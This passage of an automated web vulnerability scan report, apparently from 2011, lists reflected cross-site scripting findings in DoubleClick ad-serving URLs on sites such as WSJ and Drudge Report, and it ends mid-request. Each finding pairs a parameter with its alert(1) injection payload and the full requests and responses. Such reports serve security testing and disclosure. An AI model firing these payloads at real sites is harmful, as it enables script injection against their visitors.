Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csda
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e7f3"-alert(1)-"8abaf15a711 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:20:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/19f/%2a/c%3B234501632%3B1-0%3B0%3B57841699%3B3454-728/90%3B40013199/40030986/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2Ut
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 was submitted in the !category parameter. This input was echoed as f6345"style="x:expression(alert(1))"760be3c0573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 485

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;f6345"style="x:expression(alert(1))"760be3c0573;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b967b"style%3d"x%3aexpression(alert(1))"43f320cd246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b967b"style="x:expression(alert(1))"43f320cd246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;&b967b"style%3d"x%3aexpression(alert(1))"43f320cd246=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 488

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;&b967b"style="x:expression(alert(1))"43f320cd246=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 was submitted in the !category parameter. This input was echoed as 24f47"style="x:expression(alert(1))"ed49986df20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 604

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;24f47"style="x:expression(alert(1))"ed49986df20;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad783"style="x:expression(alert(1))"7c9d84b3db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;&ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 607

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;&ad783"style="x:expression(alert(1))"7c9d84b3db8=1;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 was submitted in the !category parameter. This input was echoed as 44e25"style="x:expression(alert(1))"92bb3f4bb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 532

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;1-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;44e25"style="x:expression(alert(1))"92bb3f4bb02;~aopt=6/0/ff/0;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

1.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a17"style="x:expression(alert(1))"c28df2770ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;&b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 537

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;0-0;0;31680223;1839-230/70;31981065/31998941/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;&b5a17"style="x:expression(alert(1))"c28df2770ea=1;~aopt=6/0/ff/0;~sscs=%3fhttps://www.wsjwine.com/discovery_offer.aspx?promo=2033001">
...[SNIP]...

1.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 was submitted in the u parameter. This input was echoed as 73876"style="x:expression(alert(1))"392e3d7bbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 429

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/l;44306;0-0;0;31680223;31596-2/94;0/0/0;u=;~okv=;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;73876"style="x:expression(alert(1))"392e3d7bbf7;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd5ff'-alert(1)-'9030ba385d0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ed56"-alert(1)-"dde2af71df5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note the delivery path, which applies to every finding against this adj path: the response is served as application/x-javascript and is consumed through a script tag on the publisher page (the Referer here is drudgereport.com), so the injected code runs in the origin of whichever site embeds this ad tag, not on ad.doubleclick.net. A victim who opens the crafted ad.doubleclick.net URL directly only receives a script file; exploitation needs a page that emits the tag with attacker-chosen click-URL parameters.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86415'-alert(1)-'b736f4a5c56 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
